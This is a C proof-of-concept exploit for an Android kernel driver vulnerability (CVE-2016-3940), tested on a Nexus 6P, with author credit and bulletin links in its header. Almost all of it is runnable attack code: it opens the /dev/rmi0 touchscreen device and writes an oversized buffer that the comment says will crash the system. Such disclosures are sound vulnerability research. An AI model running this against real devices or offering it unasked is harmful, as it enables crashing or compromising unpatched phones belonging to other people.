/*
https://code.google.com/p/android/issues/detail?id=215777
https://source.android.com/security/bulletin/2016-10-01.html, CVE-2016-3940

test the poc on nexus 6p with fingerprint :  google/angler/angler:6.0.1/MTC19X/2960136:user/release-keys
Author : Gengjia Chen (chengjia4574@gmail.com)
Time: 20161012
*/

#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <asm/ioctl.h>

int test_write(int fd)
{
#define SIZE 0xffff // will crash
	int ret;
	char buf[SIZE] = {0};

	ret = write(fd, buf, SIZE);
	if(ret<0) {
		printf("write fail %s\n",strerror(errno));
	} else printf("succ write %d byte\n",ret);
	return 0;
}

	int
main(int argc, char *argv[])
{
	char* path = "/dev/rmi0"; 
	int fd;
	int ret;

	fd = open(path, O_RDWR);
	if(fd<0) {
		printf("open fail %s\n",strerror(errno));
		return -1;
	}
	printf("open %s succ\n",path);
	test_write(fd);
	close(fd);
	return 0;
}
